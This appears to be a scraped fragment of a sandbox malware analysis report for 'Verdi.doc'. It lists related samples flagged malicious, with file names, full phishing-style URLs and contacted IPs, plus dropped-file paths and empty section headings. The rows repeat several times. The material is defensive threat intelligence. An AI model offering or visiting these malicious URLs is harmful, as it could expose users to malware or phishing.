	95Lem1PN4D.doc	Get hash	malicious	Browse	67.225.179.64
	presentation.vbs	Get hash	malicious	Browse	147.139.136.241
	67236236726723567.pdf	Get hash	malicious	Browse	3.3.0.2
	https://storage.googleapis.com/staging.tfv-b54-edfy-kujh-9oi.appspot.com/7654w3setdrfghb.vcxzsdy5yrftrgrf/e%20t%20d%20r%20f%20t%20g%20yu%20h%20j%20.%205%20e%20r%20t%20e%20g%20s%20df%20c%20.%20y%20r%20t%20h%20g/uteyjrhgvc.4wa3estdg.rtrdfrd/eu5yrjth.g5es65rsytf	Get hash	malicious	Browse	74.120.188.194
	RFQ 954686.html	Get hash	malicious	Browse	107.180.57.212
unknown	GoogleEarthProSetup.exe	Get hash	malicious	Browse	172.217.23.206
	https://teknova-my.sharepoint.com/:b:/g/personal/jens_karlsson_teknova_se/EUus5-kt6ylJpLQVWENoM-gBztEvK2vvNZNOn1Un9M72-Q	Get hash	malicious	Browse	97.74.6.168
	http://app.harridoza.icu/?u=630wkwf&o=uhhp6zh&t=5ae3bbb32b70aad1b818c6dded9fa9d4&cid=wc9j349gulbl69jqhs41569c&trump=winbigger.club	Get hash	malicious	Browse	193.35.51.12
	Balance-Payment.html	Get hash	malicious	Browse	108.163.231.9
	k8tvLoVAAF.exe	Get hash	malicious	Browse	192.168.2.14
	OHY8adr7PL.exe	Get hash	malicious	Browse	192.168.2.14
	WXO7ibOBUf.exe	Get hash	malicious	Browse	192.168.2.12
	j7BzdiOJV9.exe	Get hash	malicious	Browse	192.168.2.14
	Ve7xJOvTJY.exe	Get hash	malicious	Browse	192.168.2.14
	Gq94UeOwn7.exe	Get hash	malicious	Browse	192.168.2.14
	pzEC0goeOS.exe	Get hash	malicious	Browse	192.168.2.14
	DOCUMENTO 06.doc	Get hash	malicious	Browse	104.18.56.96
	info_11_06.doc	Get hash	malicious	Browse	77.87.212.69
	8zwECUx69c.exe	Get hash	malicious	Browse	192.168.2.14
	2019_05_S1800735585_H0043475.xls	Get hash	malicious	Browse	47.254.236.15
	95Lem1PN4D.doc	Get hash	malicious	Browse	67.225.179.64
	presentation.vbs	Get hash	malicious	Browse	147.139.136.241
	67236236726723567.pdf	Get hash	malicious	Browse	3.3.0.2
	https://storage.googleapis.com/staging.tfv-b54-edfy-kujh-9oi.appspot.com/7654w3setdrfghb.vcxzsdy5yrftrgrf/e%20t%20d%20r%20f%20t%20g%20yu%20h%20j%20.%205%20e%20r%20t%20e%20g%20s%20df%20c%20.%20y%20r%20t%20h%20g/uteyjrhgvc.4wa3estdg.rtrdfrd/eu5yrjth.g5es65rsytf	Get hash	malicious	Browse	74.120.188.194
	RFQ 954686.html	Get hash	malicious	Browse	107.180.57.212
unknown	GoogleEarthProSetup.exe	Get hash	malicious	Browse	172.217.23.206
	https://teknova-my.sharepoint.com/:b:/g/personal/jens_karlsson_teknova_se/EUus5-kt6ylJpLQVWENoM-gBztEvK2vvNZNOn1Un9M72-Q	Get hash	malicious	Browse	97.74.6.168
	http://app.harridoza.icu/?u=630wkwf&o=uhhp6zh&t=5ae3bbb32b70aad1b818c6dded9fa9d4&cid=wc9j349gulbl69jqhs41569c&trump=winbigger.club	Get hash	malicious	Browse	193.35.51.12
	Balance-Payment.html	Get hash	malicious	Browse	108.163.231.9
	k8tvLoVAAF.exe	Get hash	malicious	Browse	192.168.2.14
	OHY8adr7PL.exe	Get hash	malicious	Browse	192.168.2.14
	WXO7ibOBUf.exe	Get hash	malicious	Browse	192.168.2.12
	j7BzdiOJV9.exe	Get hash	malicious	Browse	192.168.2.14
	Ve7xJOvTJY.exe	Get hash	malicious	Browse	192.168.2.14
	Gq94UeOwn7.exe	Get hash	malicious	Browse	192.168.2.14
	pzEC0goeOS.exe	Get hash	malicious	Browse	192.168.2.14
	DOCUMENTO 06.doc	Get hash	malicious	Browse	104.18.56.96
	info_11_06.doc	Get hash	malicious	Browse	77.87.212.69
	8zwECUx69c.exe	Get hash	malicious	Browse	192.168.2.14
	2019_05_S1800735585_H0043475.xls	Get hash	malicious	Browse	47.254.236.15
	95Lem1PN4D.doc	Get hash	malicious	Browse	67.225.179.64
	presentation.vbs	Get hash	malicious	Browse	147.139.136.241
	67236236726723567.pdf	Get hash	malicious	Browse	3.3.0.2
	https://storage.googleapis.com/staging.tfv-b54-edfy-kujh-9oi.appspot.com/7654w3setdrfghb.vcxzsdy5yrftrgrf/e%20t%20d%20r%20f%20t%20g%20yu%20h%20j%20.%205%20e%20r%20t%20e%20g%20s%20df%20c%20.%20y%20r%20t%20h%20g/uteyjrhgvc.4wa3estdg.rtrdfrd/eu5yrjth.g5es65rsytf	Get hash	malicious	Browse	74.120.188.194
	RFQ 954686.html	Get hash	malicious	Browse	107.180.57.212

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmp	VERDI (002).doc	Get hash	malicious	Browse
C:\Windows\Temp\wupd12.14.tmp	VERDI (002).doc	Get hash	malicious	Browse

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Verdi.doc

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Cryptography:

Spreading:

Software Vulnerabilities:

Networking:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails